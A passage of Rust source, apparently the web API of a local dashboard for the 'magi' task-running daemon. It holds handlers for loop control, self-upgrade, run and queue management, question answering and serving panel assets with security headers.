1860 Some(pid) => format!("another magi process (pid {pid})"),
1861 None => "another magi process".to_owned(),
1862 }
1863 }
1864}
1865
1866type Launch = fn(daemon::Opts, daemon::Stop) -> Pin<Box<dyn Future<Output = Result<()>> + Send>>;
1871
1872fn launch_daemon(
1874 opts: daemon::Opts,
1875 stop: daemon::Stop,
1876) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
1877 Box::pin(daemon::serve_until(opts, stop))
1878}
1879
1880#[derive(Debug, Default)]
1882struct LoopState {
1883 live: Option<Live>,
1885 rev: u64,
1893 last_error: Option<String>,
1896}
1897
1898#[derive(Debug)]
1900struct Live {
1901 stop: daemon::Stop,
1903 handle: tokio::task::JoinHandle<()>,
1908 opts: daemon::Opts,
1912}
1913
1914impl Live {
1915 fn alive(&self) -> bool {
1917 !self.handle.is_finished()
1918 }
1919}
1920
1921fn lock_or_recover(state: &Mutex<LoopState>) -> MutexGuard<'_, LoopState> {
1928 state.lock().unwrap_or_else(PoisonError::into_inner)
1929}
1930
1931async fn loop_get(State(ui): State<Arc<Ui>>) -> ApiResult<Json<LoopView>> {
1933 blocking(move || {
1934 let reading = daemon::read_status(&ui.home);
1935 Ok(Json(ui.loop_view(reading)))
1936 })
1937 .await
1938}
1939
1940#[derive(Debug, Deserialize)]
1946#[serde(deny_unknown_fields)]
1947struct LoopCommand {
1948 running: bool,
1949 #[serde(default)]
1959 park: bool,
1960}
1961
1962async fn loop_post(
1970 State(ui): State<Arc<Ui>>,
1971 body: std::result::Result<Json<LoopCommand>, JsonRejection>,
1972) -> ApiResult<Json<LoopView>> {
1973 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
1976 blocking(move || {
1977 let reading = daemon::read_status(&ui.home);
1978 let foreign = Foreign::of(reading.as_ref());
1979 if body.running {
1980 ui.start_loop(foreign)?;
1981 } else {
1982 ui.stop_loop(foreign, body.park)?;
1983 }
1984 Ok(Json(ui.loop_view(reading)))
1985 })
1986 .await
1987}
1988
1989#[derive(Debug, Serialize)]
1991struct UpgradeView {
1992 from: String,
1994 to: Option<String>,
1996 parked: Option<String>,
1998 detail: String,
2000}
2001
2002async fn upgrade_post(State(ui): State<Arc<Ui>>) -> ApiResult<(StatusCode, Json<UpgradeView>)> {
2026 let reading = daemon::read_status(&ui.home);
2027 if let Some(other) = Foreign::of(reading.as_ref()) {
2028 return Err(ApiError::conflict(format!(
2029 "the loop belongs to {}, so replacing this binary would leave \
2030 that process running an old one against the same queue. Upgrade \
2031 where it was started.",
2032 other.who()
2033 )));
2034 }
2035
2036 if crate::updater::disabled_by_env() {
2042 return Ok((
2043 StatusCode::OK,
2044 Json(UpgradeView {
2045 from: env!("CARGO_PKG_VERSION").to_owned(),
2046 to: None,
2047 parked: None,
2048 detail: format!(
2049 "Automatic updates are disabled by {}. Nothing was parked \
2050 and nothing restarted.",
2051 crate::updater::NO_AUTOUPDATE_ENV
2052 ),
2053 }),
2054 ));
2055 }
2056
2057 let (cfg, _) = Config::discover(&ui.repo, None).unwrap_or_default();
2062 let from = env!("CARGO_PKG_VERSION").to_owned();
2063 let latest = match crate::updater::Checker::new(&cfg.update) {
2064 Some(checker) => checker
2065 .newer_release()
2066 .await
2067 .map_err(|e| ApiError::internal(format!("check for a release: {e:#}")))?,
2068 None => None,
2069 };
2070 let Some(latest) = latest else {
2071 return Ok((
2072 StatusCode::OK,
2073 Json(UpgradeView {
2074 from,
2075 to: None,
2076 parked: None,
2077 detail: "Already on the newest release. Nothing was parked \
2078 and nothing restarted."
2079 .to_owned(),
2080 }),
2081 ));
2082 };
2083
2084 let parked = ui.park_for_upgrade()?;
2087 let detail = match &parked {
2088 Some(run) => format!(
2093 "Run {} is parking at its next step, which can take as long as \
2094 the step it is on - up to an hour for an implement wave. The \
2095 deck replaces itself once it parks, comes back, and the loop \
2096 carries that run on from where it stopped. Nothing is lost if \
2097 you close this.",
2098 crate::run::short_of(run)
2099 ),
2100 None => "The deck replaces itself and comes back. Nothing was in \
2101 flight to park."
2102 .to_owned(),
2103 };
2104
2105 let mut progress = updater::Progress::new(from.clone(), latest.tag_name.clone());
2109 progress.parked_run = parked.clone();
2110 let _ = updater::write_progress(&ui.home, &progress);
2111
2112 let home = ui.home.clone();
2113 tokio::spawn(async move {
2114 if let Err(e) = upgrade_and_restart(home.clone()).await {
2115 tracing::error!("the upgrade did not complete: {e:#}");
2116 if let Some(mut progress) = updater::read_progress(&home) {
2117 progress.fail(format!("{e:#}"));
2118 let _ = updater::write_progress(&home, &progress);
2119 }
2120 }
2121 });
2122
2123 Ok((
2124 StatusCode::ACCEPTED,
2125 Json(UpgradeView {
2126 from,
2127 to: Some(latest.tag_name),
2128 parked,
2129 detail,
2130 }),
2131 ))
2132}
2133
2134async fn upgrade_and_restart(home: PathBuf) -> Result<()> {
2139 crate::updater::run_self_update(true, false, true).await?;
2142 tracing::info!("binary replaced - asking the server to hand over");
2143 if let Some(mut progress) = updater::read_progress(&home) {
2144 progress.advance(updater::Stage::Replaced);
2145 let _ = updater::write_progress(&home, &progress);
2146 }
2147 HANDOVER.notify_one();
2148 Ok(())
2149}
2150
2151#[derive(Debug, Serialize)]
2157struct RunSummary {
2158 id: String,
2159 short: String,
2160 status: String,
2161 done: bool,
2162 instruction: String,
2163 title: String,
2164 repo: String,
2165 repo_name: String,
2166 created_at: String,
2167 updated_at: String,
2168 candidates: usize,
2169 viable: usize,
2170 judges: usize,
2171 winner: Option<char>,
2172 reviews: usize,
2173 quota_losses: usize,
2174 event: Option<String>,
2175 superseded_by: Option<String>,
2180 waiting: bool,
2187 live: crate::run::Liveness,
2191 pr: Option<crate::run::PrRecord>,
2193 unmerged_by_design: bool,
2199}
2200
2201impl RunSummary {
2202 fn of(state: &RunState, waiting: bool, live: crate::run::Liveness) -> Self {
2203 Self {
2204 id: state.id.clone(),
2205 short: state.short().to_owned(),
2206 status: status_word(state.status),
2207 done: state.status.done(),
2208 unmerged_by_design: state.unmerged_by_design(),
2209 instruction: state.instruction.clone(),
2210 title: title_from(&state.instruction, TITLE_MAX),
2211 repo: state.repo.display().to_string(),
2212 repo_name: state
2213 .repo
2214 .file_name()
2215 .map(|n| n.to_string_lossy().into_owned())
2216 .unwrap_or_default(),
2217 created_at: state.created_at.to_string(),
2218 updated_at: state.updated_at.to_string(),
2219 candidates: state.candidates.len(),
2220 viable: state.viable().len(),
2221 judges: state.config.graph.judges,
2222 winner: state.winner().map(|c| c.label),
2223 reviews: state.reviews.len(),
2224 quota_losses: state.quota.len(),
2225 event: state.events.last().map(|e| e.message.clone()),
2226 waiting,
2227 live,
2228 superseded_by: None,
2231 pr: state.pr.clone(),
2232 }
2233 }
2234}
2235
2236fn status_word(status: RunStatus) -> String {
2239 status.as_str().to_owned()
2243}
2244
2245#[derive(Debug, Deserialize)]
2247struct ListQuery {
2248 #[serde(default)]
2249 limit: Option<usize>,
2250}
2251
2252async fn runs_list(
2253 State(ui): State<Arc<Ui>>,
2254 Query(q): Query<ListQuery>,
2255) -> ApiResult<Json<Vec<RunSummary>>> {
2256 let limit = q.limit.unwrap_or(LIST_DEFAULT).min(LIST_MAX);
2257 blocking(move || {
2258 let superseded = superseded_runs(&ui.queue);
2259 let open_runs: HashSet<String> = ui
2263 .questions
2264 .list()
2265 .into_iter()
2266 .filter(|q| q.status.open())
2267 .map(|q| q.run)
2268 .collect();
2269 let claimed: HashSet<String> =
2270 crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2271 .into_iter()
2272 .map(|c| c.run)
2273 .collect();
2274 let states = run_ids(&ui.runs)
2275 .into_iter()
2276 .filter_map(|id| read_run(&ui.runs, &id).ok())
2281 .take(limit);
2282 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::real());
2283 let summaries = summarize(
2284 states,
2285 &open_runs,
2286 &claimed,
2287 &superseded,
2288 |p| probe.borrow_mut().status(p),
2289 |p| probe.borrow_mut().started_at(p),
2290 );
2291 Ok(Json(summaries))
2292 })
2293 .await
2294}
2295
2296fn summarize<I, S, D>(
2302 states: I,
2303 open_runs: &HashSet<String>,
2304 claimed: &HashSet<String>,
2305 superseded: &HashMap<String, String>,
2306 mut status_q: S,
2307 mut identity_q: D,
2308) -> Vec<RunSummary>
2309where
2310 I: IntoIterator<Item = RunState>,
2311 S: FnMut(u32) -> Option<bool>,
2312 D: FnMut(u32) -> Option<String>,
2313{
2314 states
2315 .into_iter()
2316 .map(|state| {
2317 let waiting = open_runs.contains(&state.id);
2318 let live =
2319 state.liveness_with(claimed.contains(&state.id), &mut status_q, &mut identity_q);
2320 let mut row = RunSummary::of(&state, waiting, live);
2321 row.superseded_by = superseded
2322 .get(&state.id)
2323 .map(String::as_str)
2324 .map(crate::run::short_of)
2325 .map(str::to_owned);
2326 row
2327 })
2328 .collect()
2329}
2330
2331fn superseded_runs(queue: &Queue) -> HashMap<String, String> {
2344 let mut by = HashMap::new();
2345 for task in queue.list() {
2346 for pair in task.runs.windows(2) {
2347 if let [earlier, later] = pair {
2348 by.insert(earlier.clone(), later.clone());
2349 }
2350 }
2351 }
2352 by
2353}
2354
2355#[derive(Debug, Serialize)]
2362struct RunDetailView {
2363 #[serde(flatten)]
2364 state: RunState,
2365 instruction_md: Vec<md::Node>,
2366 live: crate::run::Liveness,
2381 unmerged_by_design: bool,
2386}
2387
2388impl RunDetailView {
2389 fn of(state: RunState, live: crate::run::Liveness) -> Self {
2390 Self {
2391 instruction_md: md::to_nodes(&state.instruction, &md::ImageBase::None),
2392 live,
2393 unmerged_by_design: state.unmerged_by_design(),
2394 state,
2395 }
2396 }
2397}
2398
2399async fn run_detail(
2400 State(ui): State<Arc<Ui>>,
2401 Path(id): Path<String>,
2402) -> ApiResult<Json<RunDetailView>> {
2403 blocking(move || {
2404 let id = resolve_run(&ui.runs, &id)?;
2405 let state = read_run(&ui.runs, &id)?;
2406 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2407 let live = state.liveness(daemon_claims);
2408 Ok(Json(RunDetailView::of(state, live)))
2409 })
2410 .await
2411}
2412
2413async fn run_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2422 let (id, unreadable) = {
2423 let ui = Arc::clone(&ui);
2424 blocking(move || {
2425 let id = resolve_run(&ui.runs, &id)?;
2426 match read_run(&ui.runs, &id) {
2427 Ok(state) => {
2428 let in_flight =
2429 crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2430 state
2431 .ensure_can_delete(in_flight)
2432 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
2433 let dir = ui.runs.join(&id);
2434 std::fs::remove_dir_all(&dir)
2435 .with_context(|| format!("remove run directory {}", dir.display()))?;
2436 Ok((id, false))
2437 }
2438 Err(_) => {
2439 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2443 return Err(ApiError::conflict(format!(
2444 "run {id} is being worked on by a live daemon right now"
2445 )));
2446 }
2447 Ok((id, true))
2448 }
2449 }
2450 })
2451 .await?
2452 };
2453 if unreadable {
2454 crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2455 .await
2456 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2457 }
2458 let ui = Arc::clone(&ui);
2459 let done = id.clone();
2460 blocking(move || {
2461 ui.questions.abandon_for_run(
2464 &done,
2465 &format!("run {done} was deleted, so nothing is waiting for this answer"),
2466 )?;
2467 Ok(())
2468 })
2469 .await?;
2470 Ok(StatusCode::NO_CONTENT)
2471}
2472
2473async fn run_fold(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Json<FoldView>> {
2497 let (id, state) = {
2498 let ui = Arc::clone(&ui);
2499 blocking(move || {
2500 let id = resolve_run(&ui.runs, &id)?;
2501 if crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now()) {
2502 return Err(ApiError::conflict(format!(
2503 "run {id} is being worked on by a live daemon right now"
2504 )));
2505 }
2506 let state = read_run(&ui.runs, &id).ok();
2507 Ok((id, state))
2508 })
2509 .await?
2510 };
2511 let removed = match state {
2512 Some(mut state) => {
2513 let removed = crate::graph::fold_run(&mut state, true, &ui.home)
2514 .await
2515 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2516 if removed.is_empty() {
2521 crate::clean::clear_abandoned_active(&mut state, &ui.home, jiff::Timestamp::now())
2522 .map_err(|e| ApiError::internal(format!("{e:#}")))?;
2523 }
2524 removed
2525 }
2526 None => crate::clean::fold_unreadable(&ui.runs, &ui.worktrees_root, &id)
2527 .await
2528 .map_err(|e| ApiError::internal(format!("{e:#}")))?,
2529 };
2530 Ok(Json(FoldView {
2531 run: id,
2532 removed_count: removed.len(),
2533 removed,
2534 }))
2535}
2536
2537#[derive(Debug, Serialize)]
2539struct FoldView {
2540 run: String,
2541 removed: Vec<String>,
2543 removed_count: usize,
2544}
2545
2546async fn run_resume(
2566 State(ui): State<Arc<Ui>>,
2567 Path(id): Path<String>,
2568) -> ApiResult<(StatusCode, Json<RunSummary>)> {
2569 let (id, state) = {
2570 let ui = Arc::clone(&ui);
2571 blocking(move || {
2572 let id = resolve_run(&ui.runs, &id)?;
2573 let state = read_run(&ui.runs, &id)?;
2574 Ok((id, state))
2575 })
2576 .await?
2577 };
2578 if !state.status.resumable() {
2579 return Err(ApiError::conflict(format!(
2580 "run {} is `{}`, and only a stalled or blocked run can be resumed",
2581 state.short(),
2582 status_word(state.status)
2583 )));
2584 }
2585 if let Some(work) = crate::daemon::current_work(&ui.home, jiff::Timestamp::now())
2590 .into_iter()
2591 .next()
2592 {
2593 return Err(ApiError::conflict(format!(
2594 "the loop is running run {} right now; stop it first, or wait for \
2595 it to finish, before resuming a run by hand.",
2596 crate::run::short_of(&work.run)
2597 )));
2598 }
2599 let _resume = ui.begin_resume(&id)?;
2600
2601 let queued = RunSummary::of(
2604 &state,
2605 !ui.questions.open_for(&id).is_empty(),
2606 state.liveness(false),
2607 );
2608 let run = id.clone();
2609 tokio::spawn(async move {
2610 let _resume = _resume;
2611 match crate::graph::Runner::resume(&run) {
2612 Ok(mut runner) => {
2613 if let Err(e) = runner.execute().await {
2614 tracing::warn!("resume of run {run} stopped: {e:#}");
2615 }
2616 }
2617 Err(e) => tracing::warn!("run {run} could not be resumed: {e:#}"),
2620 }
2621 });
2622 Ok((StatusCode::ACCEPTED, Json(queued)))
2623}
2624
2625async fn run_report(
2626 State(ui): State<Arc<Ui>>,
2627 Path(id): Path<String>,
2628) -> ApiResult<impl IntoResponse> {
2629 let text = blocking(move || {
2630 let id = resolve_run(&ui.runs, &id)?;
2631 let state = read_run(&ui.runs, &id)?;
2635 let daemon_claims = crate::daemon::is_working_on(&ui.home, &id, jiff::Timestamp::now());
2636 let live = state.liveness(daemon_claims);
2637 Ok(format!(
2638 "{}{}",
2639 report::run(&state),
2640 report::active_seats(&state, live)
2641 ))
2642 })
2643 .await?;
2644 Ok(([(header::CONTENT_TYPE, "text/plain; charset=utf-8")], text))
2645}
2646
2647#[derive(Debug, Serialize)]
2653struct TaskView {
2654 #[serde(flatten)]
2655 task: Task,
2656 source_label: String,
2657 status_str: &'static str,
2658 instruction_md: Vec<md::Node>,
2662 waits_on: Vec<String>,
2666 stuck_roots: Vec<String>,
2669}
2670
2671impl From<Task> for TaskView {
2672 fn from(task: Task) -> Self {
2673 Self {
2674 source_label: task.source.label(),
2675 status_str: task.status.as_str(),
2676 instruction_md: md::to_nodes(&task.instruction, &md::ImageBase::None),
2677 waits_on: Vec::new(),
2678 stuck_roots: Vec::new(),
2679 task,
2680 }
2681 }
2682}
2683
2684impl TaskView {
2685 fn with_inventory(task: Task, inv: &crate::blockers::Inventory) -> Self {
2686 let waits_on = inv.waits_on(&task);
2687 let stuck_roots = inv
2688 .stuck_roots(&task)
2689 .iter()
2690 .map(|r| r.rsplit('-').next().unwrap_or(r).to_owned())
2691 .collect();
2692 Self {
2693 waits_on,
2694 stuck_roots,
2695 ..Self::from(task)
2696 }
2697 }
2698}
2699
2700#[derive(Debug, Default, Deserialize)]
2703#[serde(default)]
2704struct ReposQuery {
2705 refresh: u8,
2706}
2707
2708async fn repos_list(
2715 State(ui): State<Arc<Ui>>,
2716 Query(q): Query<ReposQuery>,
2717) -> ApiResult<Json<Vec<repos::Repo>>> {
2718 let refresh = q.refresh != 0;
2719 blocking(move || {
2720 let (cfg, _) = Config::discover(&ui.repo, None)?;
2721 Ok(Json(ui.repos_cache.list(
2722 &cfg.repos.roots,
2723 Duration::from_secs(cfg.repos.scan_ttl),
2724 refresh,
2725 )))
2726 })
2727 .await
2728}
2729
2730async fn queue_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TaskView>>> {
2731 blocking(move || {
2732 let tasks = ui.queue.list();
2733 let inv = crate::blockers::Inventory::new(tasks.clone(), &ui.questions.list());
2734 Ok(Json(
2735 tasks
2736 .into_iter()
2737 .map(|t| TaskView::with_inventory(t, &inv))
2738 .collect(),
2739 ))
2740 })
2741 .await
2742}
2743
2744#[derive(Debug, Default, Deserialize)]
2747#[serde(default, deny_unknown_fields)]
2748struct HoldBody {
2749 reason: Option<String>,
2750}
2751
2752async fn queue_hold(
2753 State(ui): State<Arc<Ui>>,
2754 Path(id): Path<String>,
2755 body: std::result::Result<Json<HoldBody>, JsonRejection>,
2756) -> ApiResult<Json<TaskView>> {
2757 let body = match body {
2761 Ok(Json(body)) => body,
2762 Err(JsonRejection::MissingJsonContentType(_)) => HoldBody::default(),
2763 Err(e) => return Err(ApiError::bad_request(e.body_text())),
2764 };
2765 let reason = body.reason.filter(|r| !r.trim().is_empty());
2766 mutate(ui, id, move |t| {
2767 t.hold_manual(reason.clone());
2768 Ok(())
2769 })
2770 .await
2771}
2772
2773async fn queue_release(
2774 State(ui): State<Arc<Ui>>,
2775 Path(id): Path<String>,
2776) -> ApiResult<Json<TaskView>> {
2777 mutate(ui, id, |t| {
2778 t.release();
2779 Ok(())
2780 })
2781 .await
2782}
2783
2784#[derive(Debug, Deserialize)]
2786#[serde(deny_unknown_fields)]
2787struct PriorityBody {
2788 priority: i32,
2789}
2790
2791async fn queue_priority(
2797 State(ui): State<Arc<Ui>>,
2798 Path(id): Path<String>,
2799 body: std::result::Result<Json<PriorityBody>, JsonRejection>,
2800) -> ApiResult<Json<TaskView>> {
2801 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
2802 mutate(ui, id, move |t| t.set_priority(body.priority)).await
2803}
2804
2805#[derive(Debug, Deserialize)]
2807#[serde(deny_unknown_fields)]
2808struct EditBody {
2809 title: String,
2810 instruction: String,
2811}
2812
2813async fn queue_edit(
2817 State(ui): State<Arc<Ui>>,
2818 Path(id): Path<String>,
2819 body: std::result::Result<Json<EditBody>, JsonRejection>,
2820) -> ApiResult<Json<TaskView>> {
2821 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
2822 mutate(ui, id, move |t| {
2823 t.edit(body.title.clone(), body.instruction.clone())
2824 })
2825 .await
2826}
2827
2828async fn queue_done(
2836 State(ui): State<Arc<Ui>>,
2837 Path(id): Path<String>,
2838) -> ApiResult<Json<TaskView>> {
2839 mutate(ui, id, |t| {
2840 t.succeed();
2841 Ok(())
2842 })
2843 .await
2844}
2845
2846async fn queue_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
2854 blocking(move || {
2855 let id = resolve_task(&ui.queue, &id)?;
2856 let in_flight = crate::daemon::is_working_on_task(&ui.home, &id, jiff::Timestamp::now());
2857 ui.queue
2858 .remove(&id, in_flight, &ui.questions)
2859 .map_err(|e| ApiError::conflict(format!("{e:#}")))?;
2860 Ok(StatusCode::NO_CONTENT)
2861 })
2862 .await
2863}
2864
2865async fn mutate(
2874 ui: Arc<Ui>,
2875 id: String,
2876 change: impl FnOnce(&mut Task) -> Result<()> + Send + 'static,
2877) -> ApiResult<Json<TaskView>> {
2878 blocking(move || {
2879 let id = resolve_task(&ui.queue, &id)?;
2880 let _claim = ui.queue.claim(&id).map_err(|e| {
2885 ApiError::conflict(format!(
2886 "{e:#} - a daemon is running this task, so it cannot be \
2887 changed from here yet"
2888 ))
2889 })?;
2890 let mut task = ui.queue.get(&id)?;
2891 change(&mut task).map_err(ApiError::bad_request_from)?;
2892 ui.queue.put(&mut task)?;
2893 Ok(Json(TaskView::from(task)))
2894 })
2895 .await
2896}
2897
2898async fn events(State(ui): State<Arc<Ui>>) -> impl IntoResponse {
2906 let (tx, rx) = tokio::sync::mpsc::channel::<Event>(4);
2907 tokio::spawn(async move {
2908 let mut ticker = tokio::time::interval(POLL);
2909 let mut last: Option<(u64, u64, u64, u64, u64)> = None;
2910 loop {
2911 ticker.tick().await;
2914 let state = Arc::clone(&ui);
2915 let revisions = tokio::task::spawn_blocking(move || {
2916 (
2917 state.queue.revision(),
2918 runs_revision(&state.runs),
2919 state.questions.revision(),
2920 state.talks.revision(),
2921 state.lock_loop().rev,
2925 )
2926 })
2927 .await;
2928 let Ok(revisions) = revisions else { break };
2929 if last == Some(revisions) {
2930 continue;
2931 }
2932 last = Some(revisions);
2933 let payload = serde_json::json!({
2934 "queue_rev": revisions.0,
2935 "runs_rev": revisions.1,
2936 "questions_rev": revisions.2,
2937 "talks_rev": revisions.3,
2938 "loop_rev": revisions.4,
2939 });
2940 let Ok(event) = Event::default().event("change").json_data(payload) else {
2942 break;
2943 };
2944 if tx.send(event).await.is_err() {
2945 break;
2946 }
2947 }
2948 });
2949 Sse::new(ReceiverStream::new(rx).map(Ok::<Event, Infallible>))
2950 .keep_alive(KeepAlive::new().interval(KEEPALIVE))
2951}
2952
2953fn runs_revision(runs: &FsPath) -> u64 {
2960 use std::hash::{Hash as _, Hasher as _};
2961
2962 let mut entries: Vec<(String, u64)> = std::fs::read_dir(runs)
2963 .into_iter()
2964 .flatten()
2965 .flatten()
2966 .filter_map(|e| {
2967 let path = e.path().join("run.json");
2968 let mtime = path
2969 .metadata()
2970 .ok()?
2971 .modified()
2972 .ok()?
2973 .duration_since(std::time::UNIX_EPOCH)
2974 .ok()?
2975 .as_millis() as u64;
2976 let id = e.file_name().to_string_lossy().into_owned();
2977 Some((id, mtime))
2978 })
2979 .collect();
2980
2981 if entries.is_empty() {
2982 return 0;
2983 }
2984
2985 entries.sort_unstable();
2986 let mut hasher = std::hash::DefaultHasher::new();
2987 for (id, mtime) in &entries {
2988 id.hash(&mut hasher);
2989 mtime.hash(&mut hasher);
2990 }
2991 let h = hasher.finish();
2992 if h == 0 { 1 } else { h }
2993}
2994
2995fn run_ids(runs: &FsPath) -> Vec<String> {
3001 let mut ids: Vec<String> = std::fs::read_dir(runs)
3002 .into_iter()
3003 .flatten()
3004 .flatten()
3005 .filter(|e| e.path().join("run.json").is_file())
3006 .map(|e| e.file_name().to_string_lossy().into_owned())
3007 .collect();
3008 ids.sort_unstable_by(|a, b| b.cmp(a));
3010 ids
3011}
3012
3013fn read_run(runs: &FsPath, id: &str) -> Result<RunState> {
3015 let path = runs.join(id).join("run.json");
3016 let body =
3017 std::fs::read_to_string(&path).with_context(|| format!("read {}", path.display()))?;
3018 let state: RunState =
3019 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
3020 if state.schema != run::SCHEMA {
3021 anyhow::bail!(
3022 "run {} was written by a different magi (schema {}, this build speaks {})",
3023 state.id,
3024 state.schema,
3025 run::SCHEMA
3026 );
3027 }
3028 Ok(state)
3029}
3030
3031#[must_use]
3039pub fn runs_unreadable(runs: &FsPath) -> usize {
3040 run_ids(runs)
3041 .into_iter()
3042 .filter(|id| read_run(runs, id).is_err())
3043 .count()
3044}
3045
3046fn resolve_run(runs: &FsPath, id: &str) -> ApiResult<String> {
3048 if runs.join(id).join("run.json").is_file() {
3049 return Ok(id.to_owned());
3050 }
3051 pick(run_ids(runs), id, "run")
3052}
3053
3054fn resolve_task(queue: &Queue, id: &str) -> ApiResult<String> {
3056 if queue.path_of(id).is_file() {
3057 return Ok(id.to_owned());
3058 }
3059 pick(queue.list().into_iter().map(|t| t.id).collect(), id, "task")
3060}
3061
3062#[derive(Debug, Serialize)]
3073struct QuestionView {
3074 #[serde(flatten)]
3075 question: Question,
3076 detail_md: Vec<md::Node>,
3077 waiting_on_agent: bool,
3087}
3088
3089impl From<Question> for QuestionView {
3090 fn from(question: Question) -> Self {
3091 let base = md::ImageBase::QuestionPanel {
3092 id: question.id.clone(),
3093 };
3094 Self {
3095 detail_md: md::to_nodes(&question.detail, &base),
3096 waiting_on_agent: question.waiting_on_agent(),
3097 question,
3098 }
3099 }
3100}
3101
3102async fn questions_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<QuestionView>>> {
3108 blocking(move || {
3109 Ok(Json(
3110 ui.questions
3111 .list()
3112 .into_iter()
3113 .map(QuestionView::from)
3114 .collect(),
3115 ))
3116 })
3117 .await
3118}
3119
3120#[derive(Debug, Default, Deserialize)]
3126#[serde(default, deny_unknown_fields)]
3127struct NewAnswer {
3128 choice: Option<String>,
3129 text: Option<String>,
3130}
3131
3132async fn question_answer(
3133 State(ui): State<Arc<Ui>>,
3134 Path(id): Path<String>,
3135 body: std::result::Result<Json<NewAnswer>, axum::extract::rejection::JsonRejection>,
3136) -> ApiResult<Json<QuestionView>> {
3137 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3138 let answer = match (body.choice, body.text) {
3139 (Some(c), None) => Answer::Choice(c),
3140 (None, Some(t)) => Answer::Text(t),
3141 (Some(_), Some(_)) => {
3142 return Err(ApiError::bad_request(
3143 "send either `choice` or `text`, not both",
3144 ));
3145 }
3146 (None, None) => {
3147 return Err(ApiError::bad_request("send a `choice` or a `text`"));
3148 }
3149 };
3150
3151 blocking(move || {
3152 let id = resolve_question(&ui.questions, &id)?;
3153 let mut q = ui
3154 .questions
3155 .get(&id)
3156 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3157 if !q.status.open() {
3158 return Err(ApiError::conflict(format!(
3162 "question {} is already {}",
3163 q.short(),
3164 q.status.as_str()
3165 )));
3166 }
3167 q.answer(answer).map_err(ApiError::bad_request_from)?;
3171 ui.questions.put(&mut q)?;
3172 Ok(Json(QuestionView::from(q)))
3173 })
3174 .await
3175}
3176
3177#[derive(Debug, Deserialize)]
3179#[serde(deny_unknown_fields)]
3180struct NewSay {
3181 body: String,
3182}
3183
3184async fn question_say(
3194 State(ui): State<Arc<Ui>>,
3195 Path(id): Path<String>,
3196 body: std::result::Result<Json<NewSay>, JsonRejection>,
3197) -> ApiResult<Json<QuestionView>> {
3198 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3199 blocking(move || {
3200 let id = resolve_question(&ui.questions, &id)?;
3201 let mut q = ui
3202 .questions
3203 .get(&id)
3204 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3205 if !q.status.open() {
3206 return Err(ApiError::conflict(format!(
3210 "question {} is already {}",
3211 q.short(),
3212 q.status.as_str()
3213 )));
3214 }
3215 q.say(body.body).map_err(ApiError::bad_request_from)?;
3218 ui.questions.put(&mut q)?;
3219 Ok(Json(QuestionView::from(q)))
3220 })
3221 .await
3222}
3223
3224fn resolve_question(store: &Questions, id: &str) -> ApiResult<String> {
3226 if store.path_of(id).is_file() {
3227 return Ok(id.to_owned());
3228 }
3229 pick(
3230 store.list().into_iter().map(|q| q.id).collect(),
3231 id,
3232 "question",
3233 )
3234}
3235
3236async fn question_panel(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Response> {
3251 blocking(move || {
3252 let id = resolve_question(&ui.questions, &id)?;
3253 let Some(html) = ui.questions.panel_html(&id) else {
3254 return Err(ApiError::not_found(format!("question {id} has no panel")));
3255 };
3256 Ok(panel_response(
3257 "text/html; charset=utf-8",
3258 false,
3259 html.into_bytes(),
3260 ))
3261 })
3262 .await
3263}
3264
3265async fn question_asset(
3293 State(ui): State<Arc<Ui>>,
3294 Path((id, name)): Path<(String, String)>,
3295) -> ApiResult<Response> {
3296 if !crate::ask::valid_asset_name(&name) {
3299 return Err(ApiError::bad_request(format!(
3300 "`{name}` is not a usable asset name"
3301 )));
3302 }
3303 blocking(move || {
3304 let id = resolve_question(&ui.questions, &id)?;
3305 let asset = ui
3306 .questions
3307 .panel_asset(&id, &name)
3308 .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
3309 let Some(bytes) = asset else {
3310 return Err(ApiError::not_found(format!(
3311 "question {id} has no asset `{name}`"
3312 )));
3313 };
3314 Ok(panel_response(
3315 asset_content_type(&name),
3316 is_svg(&name),
3317 bytes,
3318 ))
3319 })
3320 .await
3321}
3322
3323fn asset_content_type(name: &str) -> &'static str {
3336 match extension(name).as_deref() {
3337 Some("png") => "image/png",
3338 Some("jpg" | "jpeg") => "image/jpeg",
3339 Some("gif") => "image/gif",
3340 Some("webp") => "image/webp",
3341 Some("svg") => "image/svg+xml",
3342 Some("css") => "text/css; charset=utf-8",
3343 Some("txt") => "text/plain; charset=utf-8",
3344 _ => "application/octet-stream",
3345 }
3346}
3347
3348fn is_svg(name: &str) -> bool {
3351 extension(name).as_deref() == Some("svg")
3352}
3353
3354fn extension(name: &str) -> Option<String> {
3356 name.rsplit_once('.')
3357 .map(|(_, ext)| ext.to_ascii_lowercase())
3358}
3359
3360fn panel_response(content_type: &'static str, download: bool, body: Vec<u8>) -> Response {
3377 let mut res = (
3378 [
3379 (header::CONTENT_TYPE, content_type),
3380 (header::CONTENT_SECURITY_POLICY, PANEL_CSP),
3381 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
3382 (header::REFERRER_POLICY, "no-referrer"),
3383 ],
3384 body,
